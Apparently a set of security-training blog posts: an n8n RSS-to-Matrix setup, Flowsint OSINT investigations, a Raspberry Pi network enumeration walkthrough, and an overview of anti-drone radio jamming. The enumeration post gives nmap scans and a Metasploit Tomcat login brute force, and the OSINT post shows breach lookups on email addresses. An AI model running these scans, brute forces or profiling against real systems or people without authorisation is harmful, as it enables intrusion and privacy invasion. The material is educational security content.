This command runs n8n as a background service that automatically restarts if it crashes or when your Pi reboots. It maps port 5678 so you can access the n8n interface, and it mounts /opt/n8n/data into the container to store your workflows and credentials so they survive container restarts. Setting N8N_SECURE_COOKIE=false lets you log in over plain HTTP, so you don't need a TLS certificate on your local network.

Give it a minute to download and start, then open your web browser and navigate to http://your-raspberry-pi-ip:5678. You should see the n8n welcome screen asking you to create your first account.
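If the welcome screen doesn't appear, check the container logs before anything else; they usually state the problem plainly:

pi> sudo docker logs -f n8n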

Step #2: Understanding the n8n Interface

Once you’re logged in and have created your first workflow, you’ll see the n8n canvas—a blank workspace where you’ll build your workflows. The interface is intuitive, but let me walk you through the key elements.

On the right side, you'll see a list of available nodes organized by category (press the Tab key to open this panel). These are the building blocks of your workflows. There are trigger nodes that start your workflow (like RSS Feed Trigger, Webhook, or Schedule), action nodes that perform specific tasks (like HTTP Request or Function), and logic nodes that control flow (like IF conditions and Switch statements).

The main canvas in the center is where you’ll drag and drop nodes and connect them. Each connection represents data flowing from one node to the next. When a workflow executes, data passes through each node in sequence, getting transformed and processed along the way.

Step #3: Creating Your First Workflow – RSS to Matrix

Now let’s build our RSS monitoring workflow. Click the “Add workflow” button to create a new workflow. Give it a meaningful name like “Security RSS to Matrix”.

We’ll start by adding our trigger node. Click the plus icon on the canvas and search for “RSS Feed Trigger”. Select it and you’ll see the node configuration panel open on the right side.

In the RSS Feed Trigger node configuration, you need to specify the RSS feed URL you want to monitor. For this example, let’s use the Hackers-Arise feed.

The RSS Feed Trigger has several important settings. The Poll Times setting determines how often n8n checks the feed for new items. You can set it to check every hour, every day, or on a custom schedule. For a security news feed, checking every hour makes sense, so you get timely notifications without overwhelming your Matrix room.

Click “Execute Node” to test it. You should see the latest articles from the feed appear in the output panel. Each article contains data like title, link, publication date, and sometimes the author. This data will flow to the next nodes in your workflow.

Step #4: Configuring Matrix Integration

Now we need to add the Matrix node to send these articles to your Matrix room. Click the plus icon to add a new node and search for “Matrix”. Select the Matrix node and “Create a message” as the action.

Before we can use the Matrix node, we need to set up credentials. Click on “Credential to connect with” and select “Create New”. You’ll need to provide your Matrix homeserver URL, your Matrix username, and password or access token.

Now comes the interesting part—composing the message. n8n uses expressions to pull data from previous nodes. In the message field, you can reference data from the RSS Feed Trigger using expressions like {{ $json.title }} and {{ $json.link }}.

Here’s a good message template that formats the RSS articles nicely:

🔔 New Article: {{ $json.title }}

{{ $json.description }}

🔗 Read more: {{ $json.link }}
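One caveat: not every feed item includes a description. n8n expressions accept JavaScript, so a fallback keeps the message from rendering an empty block; test this pattern against your particular feed:

{{ $json.description || "No description provided" }}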

Step #5: Testing and Activating Your Workflow

Click the “Execute Workflow” button at the top. You should see the workflow execute, data flow through the nodes, and if everything is configured correctly, a message will appear in your Matrix room with the latest RSS article.

Once you’ve confirmed the workflow works correctly, activate it by clicking the toggle switch at the top of the workflow editor.

The workflow is now running automatically! The RSS Feed Trigger will check for new articles according to the schedule you configured, and each new article will be sent to your Matrix room.

Summary

The workflow we built today, monitoring RSS feeds and sending security news to Matrix, demonstrates n8n’s practical value. Whether you’re aggregating threat intelligence, monitoring your infrastructure, managing your home lab, or just staying on top of technology news, n8n can eliminate the tedious manual work that consumes so much of our time.

Open Source Intelligence (OSINT): Using Flowsint for Graph-Based Investigations

19 November 2025 at 10:54

Welcome back, aspiring cyberwarriors!

In our industry, we often find ourselves overwhelmed by data from numerous sources. You might be tracking threat actors across social media platforms, mapping domain infrastructure for a penetration test, investigating cryptocurrency transactions tied to ransomware operations, or simply trying to understand how different pieces of intelligence connect to reveal the bigger picture. The challenge is not finding data but making sense of it all. Traditional OSINT tools come and go, scripts break when APIs change, and your investigation notes end up scattered across spreadsheets, text files, and fragile Python scripts that stop working the moment a service updates its interface.

As you know, the real value in intelligence work is not in collecting isolated data points but in understanding the relationships between them. A domain by itself tells you little. But when you can see that a domain connected to an IP address, that IP is tied to an ASN owned by a specific organization, that organization is linked to social media accounts, and those accounts are associated with known threat actors, suddenly you have actionable intelligence. The problem is that most OSINT tools force you to work in silos. You run one tool to enumerate subdomains, another to check WHOIS records, and a third to search for breaches. Then, you manually try to piece it all together in your head or in a makeshift spreadsheet.

To solve these problems, we’re going to explore a tool called Flowsint – an open-source graph-based investigation platform. Let’s get rolling!

Step #1: Install Prerequisites

Before we can run Flowsint, we need to make certain we have the necessary prerequisites installed on our system. Flowsint uses Docker to containerize all its components. You will also need Make, a build automation tool that builds executable programs and libraries from source code.

In this tutorial, I will be installing Flowsint on my Raspberry Pi 4 system, but the instructions are nearly identical for use with other operating systems as long as you have Docker and Make installed.

First, make certain you have Docker installed.
kali> docker --version

Next, make sure you have Make installed.
kali> make --version

Now that we have our prerequisites in place, we are ready to download and install Flowsint.

Step #2: Clone the Flowsint Repository

Flowsint is hosted on GitHub as an open-source project. Clone the repository with the following command:
kali> git clone https://github.com/reconurge/flowsint.git
kali> cd flowsint

To install and start Flowsint in production mode, simply run:
kali> make prod

This command will do several things. It will build the Docker images for all the Flowsint components and start the necessary containers, including the Neo4j graph database, a PostgreSQL database for user management, the FastAPI backend server, and the frontend application. It will also configure networking between the containers and set up the initial database schemas.

The first time you run this command, it may take several minutes to complete as Docker downloads base images and builds the Flowsint containers. You should see output in your terminal showing the progress of each build step. Once the installation completes, all the Flowsint services will be running in the background.

You can verify that the containers are running with:
kali> docker ps

Step #3: Create Your Account

With Flowsint now running, we can access the web interface and create our first user account. Open your web browser and navigate to: http://localhost:5173/register

Once you have filled in the registration form and logged in, you will now see the main interface, where you can begin building your investigations.

Step #4: Creating Your First Investigation

Let’s create a simple investigation to see how Flowsint works in practice.

After creating the investigation, we can view analytics about it and, most importantly, create our first sketch using the panel on the left. Sketches allow you to organize and visualize your data as a graph.

After creating the sketch, we need to add our first node to the ‘items’ section. In this case, let’s use a domain name.

Enter a domain name you want to investigate. For this tutorial, I will use the lenta.ru domain.

You should now see a node appear on the graph canvas representing your domain. Click on this node to select it and view the available transforms. You will see a list of operations you can perform on this domain entity.

Step #5: Running Transforms to Discover Relationships

Now that we have a domain entity in our graph, let’s run some transforms to discover related infrastructure and build out our investigation.

With your domain entity selected, look for the transform that will resolve the domain to its IP addresses. Flowsint will query DNS servers to find the IP addresses associated with your domain and create new IP entities in your graph connected to the domain with a relationship indicating the DNS resolution.

Let’s run another transform. Select your domain entity again, and this time run the WHOIS Lookup transform. This transform will query WHOIS databases to get domain registration information, including the registrar, registration date, expiration date, and sometimes contact information for the domain owner.

Now select one of the IP address entities that was discovered. You should see a different set of available transforms specific to IP addresses. Run the IP Information transform. This transform will get geolocation and network details for the IP address, including the country, city, ISP, and other relevant information.

Step #6: Chaining Transforms for Deeper Investigation

One of the powerful features of Flowsint is the ability to chain transforms together to automate complex investigation workflows. Instead of manually running each transform one at a time, you can set up sequences of transforms that execute automatically.

Let’s say you want to investigate not just a single domain but all the subdomains associated with it. Select your original domain entity and run the Domain to Subdomains transform. This transform will enumerate subdomains using various techniques, including DNS brute forcing, certificate transparency logs, and other sources.

Each discovered subdomain will appear as a new domain entity in your graph, connected to the parent domain.

Step #7: Investigating Social Media and Email Connections

Flowsint is not limited to technical infrastructure investigation. It also includes transforms for investigating individuals, organizations, social media accounts, and email addresses.

Let’s add an email address entity to our graph. In the sidebar, select the email entity type and enter an email address associated with your investigation target.

Once you have created the email entity, select it and look at the available transforms. You will see several options, including Email to Gravatar, Email to Breaches, and Email to Domains.

Summary

In many cases, cyberwarriors must make sense of vast amounts of interconnected data from diverse sources. A platform such as Flowsint provides the durable foundation we need to conduct comprehensive investigations that remain stable even as tools and data sources evolve around it.

Whether you are investigating threat actors, mapping infrastructure, tracking cryptocurrency flows, or uncovering human connections, Flowsint gives you the power to connect the dots and see the truth.

Hacking with the Raspberry Pi: Network Enumeration

17 November 2025 at 10:03

Welcome back, my aspiring cyberwarriors!

We continue exploring the Raspberry Pi’s potential for hacking. In this article, we’ll dive into network enumeration.

Enumeration is the foundational step of any penetration test—it involves systematically gathering detailed information about the hosts, services, and topology of the network you’re targeting. For the purposes of this guide, we’ll assume that you already have a foothold within the network—whether through physical proximity, compromised credentials, or another form of access—allowing you to apply a range of enumeration techniques.

Let’s get started!

Step #1: Fping

To get started, we’ll examine a lightweight utility called fping. It leverages the Internet Control Message Protocol (ICMP) echo request to determine whether a target host is responding. Unlike the traditional ping command, fping lets you specify any number of targets directly on the command line—or supply a file containing a list of targets to probe. This allows us to do a basic network discovery.

Fping comes preinstalled on Kali Linux. To confirm that it’s available and view its options, you can display the help page.

kali> fping -h

To run a quiet scan, we can use the following command:

kali> sudo fping -I wlan0 -q -a -g 192.168.0.0/24

This command runs fping with root privileges to quietly scan all IP addresses in the 192.168.0.0/24 network via the wlan0 interface, showing only the IPs that respond (i.e., hosts that are alive). At this point, we can see which systems are live on the network and are ready to be exploited. At its core, fping is very lightweight; when I ran htop and fping simultaneously, I observed the following output:

As you can see, CPU usage sits around 2% and memory usage stays below 1% in my case (my Pi board has 4 cores and 2GB of RAM).
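As mentioned earlier, fping can also read its targets from a file, which is convenient once you are tracking a fixed set of hosts across engagements. A quick example, where targets.txt is a hypothetical file containing one IP address per line:

kali> sudo fping -q -a -f targets.txt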

Step #2: Nmap

At this point, we have identified our target and can move on to the next step — network mapping with Nmap to see which ports are open. Nmap is one of the best-known tools in the cybersecurity field, and Hackers-Arise offers a dedicated training course for mastering it; you can find the course at the link.

I assume you already have a basic understanding of Nmap, so we can proceed to network enumeration.

Let’s run a simple Nmap scan to check for open ports:

kali> sudo nmap -p- --open --min-rate 5000 -n -Pn 192.168.0.150 -oG open_ports

This command checks all 65,535 TCP ports and only shows the ones that are open. It uses a high scan rate for speed (5000 packets per second) and skips DNS resolution, assuming the host is up, without pinging it. Also, the results are saved in a grepable format to a file called open_ports, so we can analyze them later.

At its peak, CPU usage was around 33%, with memory usage at roughly 2%.

As a result, we found twelve open ports and can now move on to gathering a bit more information.
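Since the results were saved in grepable format, you can pull the open ports back out with a one-liner instead of retyping them. Here is a sketch; verify the pattern against your nmap version's -oG output:

kali> grep -oP '[0-9]+(?=/open)' open_ports | sort -nu | paste -sd, -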

kali> sudo nmap -sC -sV -p135,139,445,5040,8080,49664,49665,49666,49667,49668,49669,49670 192.168.0.150

This executes Nmap's default script set (-sC), which probes the scanned ports for additional service details and common misconfigurations, while -sV performs service version detection.

This scan revealed some important information for further exploitation. The Raspberry Pi handled it quite well. I saw a brief spike in resource usage at the start, but it remained very low afterward.

Step #3: Exploitation

Let’s assume our reconnaissance is complete and we’ve discovered that the Tomcat application may be using weak credentials. We can now launch Metasploit and attempt a brute-force login.

msf6> use scanner/http/tomcat_mgr_login
msf6> set RHOSTS 192.168.0.150
msf6> run
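By default, the module cycles through its built-in username and password lists. Two standard options for Metasploit login scanners are worth setting here: STOP_ON_SUCCESS ends the scan at the first valid pair, and THREADS caps concurrency so the Pi isn't overwhelmed.

msf6> set STOP_ON_SUCCESS true
msf6> set THREADS 2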

The Raspberry Pi struggles somewhat to start Metasploit, although running it typically causes no issues.

Summary

The Raspberry Pi is a very powerful tool for every hacker. Our tools are generally lightweight, and the resources of this small board are enough to handle most tasks. So, if your budget is limited, buy a Raspberry Pi, connect it to your TV, and start learning cybersecurity.

If you want to grow in the pentesting field, check out our CWA Preparation Course — get certified, get hired, and start your journey!

SDR (Signals Intelligence) for Hackers: Getting Started with Anti-Drone Warfare

14 November 2025 at 10:33

Welcome back, aspiring cyberwarriors!

In modern warfare, we're dealing with a whole new battlefield—one that's invisible to the naked eye but just as deadly as kinetic warfare. Drones, or unmanned aerial vehicles (UAVs), have completely changed the game. From small commercial quadcopters rigged with grenades to sophisticated military platforms conducting precision strikes, these aerial threats are everywhere on today's battlefield.

But here’s the thing: they all depend on the electromagnetic spectrum to communicate, navigate, and operate. And that’s where Electronic Warfare (EW) comes in. Specifically, we’re talking about Electronic Countermeasures (ECM) designed to jam, disrupt, or even hijack these flying threats.

In this article, we’ll dive into how this invisible war is being fought. Let’s get rolling!

Understanding Radio-Electronic Warfare

Jamming UAVs falls under what’s called Radio-Electronic Warfare. The mission is simple in concept but complex in execution: disorganize the enemy’s command and control, wreck their reconnaissance efforts, and keep our own systems running smoothly.

Within this framework, we have COMJAM (suppression of radio communication channels). This is the bread and butter of counter-drone operations—disrupting the channels that control equipment and weapons, including those UAVs.

How Jamming Actually Works

Let’s get real about how this stuff actually works. It’s really just exploiting basic radio physics and the limitations of receiver systems.

Basic Jamming Principle

The Signal-to-Noise Game

All radio communication depends on what we call the signal-to-noise ratio (SNR). For a drone to receive its control commands or GPS signals, the legitimate signal must be stronger than the background electromagnetic noise.

This follows what's known as the "jamming equation." Here's what matters (a worked example follows the list):

Power output. A 30-watt personal jammer might protect just you and a small group of people, while a 200-watt system can throw up an electronic dome over a much bigger area. More watts equals more range and effectiveness.

Distance relationships. Think about it—the drone operator’s control signal has to travel several kilometers to reach the drone. But if we position our jammer between them or near the drone, we’ve got a much shorter transmission path.

Antenna gain. Directional antennas focus our jamming energy like a spotlight instead of a light bulb.

Frequency selectivity means we can target specific frequency bands used by drones while leaving other communications alone.
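To make those relationships concrete, here is a back-of-the-envelope Python sketch using the standard free-space path loss formula. The power levels, distances, and the 915 MHz band are invented for illustration; real links also involve antenna patterns, terrain, and receiver processing gain that this ignores:

from math import log10

def fspl_db(distance_km: float, freq_mhz: float) -> float:
    """Free-space path loss in dB (standard formula)."""
    return 20 * log10(distance_km) + 20 * log10(freq_mhz) + 32.44

# Hypothetical scenario: operator 5 km from the drone, jammer 500 m away,
# both on a common 915 MHz control band.
signal_dbm = 30 - fspl_db(5.0, 915)   # 1 W (30 dBm) control link
jam_dbm = 43 - fspl_db(0.5, 915)      # 20 W (43 dBm) jammer

print(f"Control signal at drone: {signal_dbm:.1f} dBm")
print(f"Jamming signal at drone: {jam_dbm:.1f} dBm")
print(f"J/S ratio: {jam_dbm - signal_dbm:.1f} dB")  # positive means the jammer wins

With these made-up numbers, the jammer arrives roughly 33 dB stronger than the control signal, which illustrates why proximity and power dominate the equation.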

Types of Jamming Signals

Types of Jamming Techniques

Different situations call for different jamming techniques; a short waveform sketch follows the list:

Noise jamming. We simply send random radio-frequency energy across the target frequencies, creating a "wall" of interference.

Tone jamming transmits continuous wave signals at specific frequencies. It’s more power-efficient for targeting narrow-band communications, but modern systems can filter this out more easily.

Pulse jamming uses intermittent bursts of energy. This can be devastating against receivers that use time-based processing, and it conserves our jammer’s power for longer operations.

Swept jamming rapidly changes frequencies across a band. If the enemy drone is frequency-hopping to avoid us, swept jamming ensures we’re hitting them somewhere, though with less power at any single frequency at any moment.

Barrage jamming simultaneously broadcasts across wide frequency ranges. It’s comprehensive coverage, but it requires serious power output.
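For intuition, the three simplest signal types are easy to simulate. This numpy sketch only generates baseband waveforms so you can compare them (for example by plotting their FFTs); it is a visualization aid, nothing more:

import numpy as np

fs = 1_000_000                   # 1 MHz sample rate
t = np.arange(0, 0.01, 1 / fs)   # 10 ms of samples

# Noise jamming: wideband random energy
noise = np.random.normal(0, 1, t.size)

# Tone jamming: one continuous carrier at 100 kHz
tone = np.sin(2 * np.pi * 100e3 * t)

# Swept jamming: linear chirp from 50 kHz to 250 kHz across the window
f0, f1, T = 50e3, 250e3, t[-1]
sweep = np.sin(2 * np.pi * (f0 * t + (f1 - f0) * t**2 / (2 * T)))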

Smart Jamming and Spoofing

The most basic jamming just drowns out signals with noise. But the most advanced systems go way beyond that, using what we call “smart jamming” or spoofing.

Smart jamming means analyzing the source signal in real-time, understanding how it works, and then replacing it with a more powerful, false signal that the target system will actually accept as legitimate.

In the context of UAV operations, this gets really sophisticated. Systems can manipulate GPS signals to provide false positioning data, making drones think they're somewhere they're not—that's spoofing. Even more advanced are systems like the Shipovnik-Aero complex, which can actually penetrate the UAV's onboard systems and potentially take control.

Shipovnik-Aero Complex

What Actually Happens When We Jam a Drone

When we successfully jam a drone, what happens depends on what we’re targeting and how the drone is programmed to respond:

Control link jamming cuts the command channel between the operator and the drone. Depending on its fail-safe programming, the drone might hover in place, automatically return to its launch point, attempt to land immediately, or continue its last programmed mission autonomously.

GPS/GNSS jamming denies the drone accurate position information. Without GPS, most commercial drones and many military ones can’t maintain stable flight or navigate to targets. Some will fall back on inertial navigation systems, but those accumulate errors over time. Others become completely disoriented and crash.

Video link jamming blinds FPV operators, forcing them to fly without visual reference. This is particularly effective against FPV kamikaze drones, which require continuous video feedback for precision targeting.

Combined jamming hits multiple systems simultaneously—control, navigation, and video—creating a comprehensive denial effect that overwhelms even drones with redundant systems.

The Arsenal of Counter-Drone Electronic Warfare Systems

The modern battlefield has an array of EW systems designed specifically for detecting and suppressing drones. These range from massive, brigade-level complexes that can throw up electronic domes over vast areas to small, portable units that individual soldiers can carry for personal protection.

Dedicated Counter-UAS (C-UAS) Systems

The AUDS (Anti-UAV Defence System) is an example of dedicated C-UAS tech. It suppresses communication channels between UAVs and their operators with suppression distances of 2-4 kilometers for small UAVs and up to 8 kilometers for medium-sized platforms. The variation in range reflects the different power levels and signal characteristics of various drone types.

AUDS

The M-LIDS (Mobile-Low, Slow, Small Unmanned Aircraft System Integrated Defeat System) takes a more comprehensive approach. This system doesn’t just jam—it combines an EW suite with a 30mm counter-drone cannon for kinetic kills and even deploys Coyote kamikaze UAVs. It’s literally using drones to fight drones.

M-LIDS

Russian Federation EW Complexes

Russian forces have invested heavily in electronic warfare, including numerous systems specifically designed for drone suppression.

The Leer-2 system offers suppression of UAV communication channels at 4 kilometers for small UAVs and up to 8 kilometers for medium platforms. The Silok system is basically a mobile variant mounted on a Kamaz chassis, with a suppression distance of 3-4 kilometers, giving tactical units mobile EW capabilities.

Leer-2

The Repellent-1 system specifically targets UAV communication channels and satellite navigation, operating in the 200-600 MHz frequency range with a suppression distance of up to 30 kilometers.

Repellent-1

Personal and Tactical-Level Counter-Drone Protection

Big systems are great for area defense, but the ubiquity of small drones has created massive demand for personal and small-unit protection. These portable devices focus on the most commonly used frequencies for commercial and modified commercial drones, providing immediate, localized protection.

The UNWAVE SHATRO represents cutting-edge personal counter-drone protection. Available in portable, wearable, and mobile versions, this system creates a protective bubble with a radius of 50-100 meters, specifically targeting guided munitions and UAVs operating in the 850-930 MHz range.

UNWAVE SHATRO

The UNWAVE BOOMBOX offers both directed protection (up to 500 meters) and omnidirectional coverage (100 meters), targeting multiple frequency bands critical to drone operations. By suppressing frequencies including 850-930 MHz, 1550-1620 MHz (GPS), 2400-2480 MHz (Wi-Fi/Control), and 5725-5850 MHz (Wi-Fi/Video), this system addresses the full spectrum of commercial drone communication and navigation systems.

UNWAVE BOOMBOX

Summary

This article examines the role of Electronic Warfare (EW) in combating unmanned aerial vehicles (UAVs), which rely on electromagnetic signals for operation. It discusses jamming techniques like noise, tone, and pulse jamming, along with advanced methods such as smart jamming and spoofing.

The invisible war for control of the electromagnetic spectrum may not capture headlines like kinetic combat, but make no mistake—it’s every bit as crucial to the outcome of modern conflicts.

Look for our Anti-Drone Warfare training in 2026!
